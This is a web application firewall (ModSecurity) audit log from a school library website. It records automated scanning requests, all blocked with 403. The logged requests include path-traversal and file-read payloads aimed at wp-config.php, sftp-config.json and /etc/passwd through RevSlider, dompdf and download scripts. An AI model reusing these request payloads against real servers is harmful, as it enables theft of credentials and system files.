--3eaab400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3eaab400-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578206143650 705 (- - -) Stopwatch2: 1745578206143650 705; combined=269, p1=241, p2=0, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3eaab400-Z-- --304c3637-A-- [25/Apr/2025:17:50:06 +0700] aAto3j8HMZgF-3Y3GtGAdQAAAEg 103.236.140.4 42712 103.236.140.4 8181 --304c3637-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268948 --304c3637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --304c3637-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578206341155 677 (- - -) Stopwatch2: 1745578206341155 677; combined=273, p1=247, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --304c3637-Z-- --46687c77-A-- [25/Apr/2025:17:50:08 +0700] aAto4OXF4ZX3hX-IbN7iHwAAAI0 103.236.140.4 42740 103.236.140.4 8181 --46687c77-B-- GET /.vscode/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268966 --46687c77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --46687c77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578208346373 714 (- - -) Stopwatch2: 1745578208346373 714; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46687c77-Z-- --5d0a481a-A-- [25/Apr/2025:17:50:08 +0700] aAto4OOdEP6frSVs8Cp44QAAAAc 103.236.140.4 42746 103.236.140.4 8181 --5d0a481a-B-- GET /resources/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362434 --5d0a481a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5d0a481a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578208543925 902 (- - -) Stopwatch2: 1745578208543925 902; combined=400, p1=367, p2=0, p3=0, p4=0, p5=32, sr=159, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d0a481a-Z-- --f744851c-A-- [25/Apr/2025:17:50:08 +0700] aAto4OOdEP6frSVs8Cp44wAAAAA 103.236.140.4 42750 103.236.140.4 8181 --f744851c-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362437 --f744851c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f744851c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578208943284 2058 (- - -) Stopwatch2: 1745578208943284 2058; combined=764, p1=382, p2=354, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f744851c-Z-- --a836d658-A-- [25/Apr/2025:17:50:11 +0700] aAto4z8HMZgF-3Y3GtGAhAAAAEc 103.236.140.4 42774 103.236.140.4 8181 --a836d658-B-- GET /ftp.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268990 --a836d658-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a836d658-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578211145678 1938 (- - -) Stopwatch2: 1745578211145678 1938; combined=728, p1=351, p2=350, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a836d658-Z-- --28fd6831-A-- [25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAigAAAEg 103.236.140.4 42788 103.236.140.4 8181 --28fd6831-B-- GET /ftps.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268999 --28fd6831-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28fd6831-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578212145445 1900 (- - -) Stopwatch2: 1745578212145445 1900; combined=672, p1=318, p2=328, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28fd6831-Z-- --aab1a820-A-- [25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAjAAAAEY 103.236.140.4 42802 103.236.140.4 8181 --aab1a820-B-- GET /ftp-config.conf HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269002 --aab1a820-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aab1a820-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578212345273 1951 (- - -) Stopwatch2: 1745578212345273 1951; combined=708, p1=342, p2=339, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aab1a820-Z-- --e95b5d21-A-- [25/Apr/2025:17:50:12 +0700] aAto5D8HMZgF-3Y3GtGAjgAAAEw 103.236.140.4 42802 103.236.140.4 8181 --e95b5d21-B-- GET /prevlaravel/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269005 --e95b5d21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e95b5d21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578212746091 685 (- - -) Stopwatch2: 1745578212746091 685; combined=320, p1=287, p2=0, p3=0, p4=0, p5=33, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e95b5d21-Z-- --943ac32c-A-- [25/Apr/2025:17:50:12 +0700] aAto5OOdEP6frSVs8Cp45gAAAA4 103.236.140.4 42810 103.236.140.4 8181 --943ac32c-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362473 --943ac32c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --943ac32c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578212942933 814 (- - -) Stopwatch2: 1745578212942933 814; combined=300, p1=266, p2=0, p3=0, p4=0, p5=34, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --943ac32c-Z-- --ad6ce00a-A-- [25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iOwAAAJM 103.236.140.4 42938 103.236.140.4 8181 --ad6ce00a-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269092 --ad6ce00a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad6ce00a-E-- --ad6ce00a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578222552148 1561 (- - -) Stopwatch2: 1745578222552148 1561; combined=515, p1=366, p2=121, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6ce00a-Z-- --e5913959-A-- [25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iPAAAAJI 103.236.140.4 42938 103.236.140.4 8181 --e5913959-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362559 --e5913959-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e5913959-E-- --e5913959-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578222750899 1725 (- - -) Stopwatch2: 1745578222750899 1725; combined=482, p1=346, p2=108, p3=0, p4=0, p5=27, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5913959-Z-- --04b4de30-A-- [25/Apr/2025:17:50:22 +0700] aAto7uXF4ZX3hX-IbN7iPgAAAIo 103.236.140.4 42952 103.236.140.4 8181 --04b4de30-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362562 --04b4de30-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --04b4de30-E-- --04b4de30-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578222949339 2728 (- - -) Stopwatch2: 1745578222949339 2728; combined=644, p1=480, p2=134, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04b4de30-Z-- --4bef930a-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iPwAAAIA 103.236.140.4 42952 103.236.140.4 8181 --4bef930a-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269098 --4bef930a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4bef930a-E-- --4bef930a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223152152 1493 (- - -) Stopwatch2: 1745578223152152 1493; combined=469, p1=355, p2=87, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bef930a-Z-- --7ffad05a-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQAAAAIY 103.236.140.4 42952 103.236.140.4 8181 --7ffad05a-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362565 --7ffad05a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7ffad05a-E-- --7ffad05a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223349585 1609 (- - -) Stopwatch2: 1745578223349585 1609; combined=507, p1=387, p2=94, p3=0, p4=0, p5=26, sr=135, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ffad05a-Z-- --bf84dd76-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQQAAAJY 103.236.140.4 42952 103.236.140.4 8181 --bf84dd76-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269101 